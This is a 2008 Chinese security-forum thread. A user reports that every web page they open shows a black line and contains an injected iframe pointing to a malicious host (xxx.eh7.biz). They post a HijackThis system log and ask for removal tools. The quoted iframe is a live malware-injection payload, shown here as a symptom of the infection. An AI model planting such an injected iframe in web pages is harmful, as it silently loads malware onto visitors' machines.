瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 打开主页时,状态栏瞬间闪过http://xxx.eh7.biz/wd/dm.htm....

1   1  /  1  页   跳转

打开主页时,状态栏瞬间闪过http://xxx.eh7.biz/wd/dm.htm....

打开主页时,状态栏瞬间闪过http://xxx.eh7.biz/wd/dm.htm....

我把百度设为主页 打开主页时,状态栏瞬间闪过http://xxx.eh7.biz/wd/dm.htm....
而且打开百度以后 左上角出现一条黑线 查看原文件 第一行就是 <iframe src='http://xxx.eh7.biz/error.htm' width=100 height=1></iframe>                                        <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
而且发现打开的网页中左上角都有一条黑线 查询原文件一样有<iframe src='http://xxx.eh7.biz/error.htm'。。。而且同样在状态栏有http://xxx.eh7.biz/wd/dm.htm....
闪过

[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

注意图中的黑线啊 每个网页上都有 估计是中了

附件附件:

下载次数:326
文件类型:image/pjpeg
文件大小:
上传时间:2008-1-5 0:50:43
描述:



最后编辑2008-01-05 23:13:36
分享到:
gototop
 

日志文件: 趋势科技 HijackThis v2.0.0 (BETA)
保存时间: 0:39:48, on 2008-1-5
操作系统: Windows XP SP2 (WinNT 5.01.2600)
启动模式: 正常

正在运行的进程:
C:\windows\System32\smss.exe
C:\windows\system32\csrss.exe
C:\windows\system32\winlogon.exe
C:\windows\system32\services.exe
C:\windows\system32\lsass.exe
C:\windows\system32\svchost.exe
C:\windows\system32\svchost.exe
C:\windows\System32\svchost.exe
C:\windows\system32\svchost.exe
C:\windows\system32\svchost.exe
C:\windows\system32\spoolsv.exe
c:\program files\barclient\barclient.exe
c:\program files\barclient\barrms.exe
c:\program files\barclient\bargames.exe
C:\windows\system32\nvsvc32.exe
C:\WINDOWS\system32\wdfmgr.exe
C:\windows\System32\alg.exe
C:\windows\Explorer.EXE
c:\program files\barclient\barads.exe
C:\windows\system32\RUNDLL32.EXE
C:\windows\RTHDCPL.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\windows\system32\ctfmon.exe
D:\软件\QQlive\MiniQQLive.exe
D:\工具\MagicSet\DS.EXE
D:\软件\QQ\QQ.exe
D:\软件\QQ\TXPlatform.exe
C:\windows\system32\conime.exe
D:\工具\U7PK游戏同步\GameSync.exe
C:\Program Files\Internet Explorer\iexplore.exe
D:\工具\Thunder\Thunder.exe
C:\TDdownload\qqkav.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\TDdownload\ha_hijackthisv2_pp\HA_HijackThisv2_PP\HiJackThis_v2.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

O2 - BHO: ThunderIEHelper - {0005A87D-D626-4B3A-84F9-1D9571695F55} - C:\WINDOWS\system32\xunleibho_v14.dll
O4 - HKLM\..\Run: [IMJPMIG8.1] ; "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [NvCplDaemon] ; RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] ; nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] ; RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [SkyTel] ; SkyTel.EXE
O4 - HKLM\..\Run: [Alcmtr] ; ALCMTR.EXE
O4 - HKLM\..\Run: [IMSCMig] ; C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMSC40A\IMSCMIG.EXE /Preload
O4 - HKLM\..\Run: [RunShadowTip] C:\WINDOWS\system32\shadow\ShadowTip.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\windows\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [ctfmon.exe] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [ctfmon.exe] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [ctfmon.exe] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [ctfmon.exe] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O8 - 扩展右键菜单项: &使用迅雷下载 - D:\工具\Thunder\geturl.htm
O8 - 扩展右键菜单项: &使用迅雷下载全部链接 - D:\工具\Thunder\getallurl.htm
O8 - 扩展右键菜单项: 导出到 Microsoft Office Excel(&X) - res://D:\软件\office\OFFICE11\EXCEL.EXE/3000
O8 - 扩展右键菜单项: 添加到QQ表情 - D:\软件\QQ\AddEmotion.htm
O10 - Unknown file in Winsock LSP: c:\windows\system32\nwprovau.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{EECE43B8-6EC5-40D6-BB6F-E39C6756675F}: NameServer = 202.99.166.4,202.99.160.68
O22 - SharedTaskScheduler: Browseui 预加载程序 - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\windows\system32\browseui.dll
O22 - SharedTaskScheduler: 组件类别缓存程序 - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\windows\system32\browseui.dll
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\windows\system32\nvsvc32.exe
O23 - Service: Shadow System Service (ShadowSystemService) - Unknown owner - C:\WINDOWS\system32\shadow\ShadowService.exe (file missing)
gototop
 

有什么好的软件可以查杀吗?
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT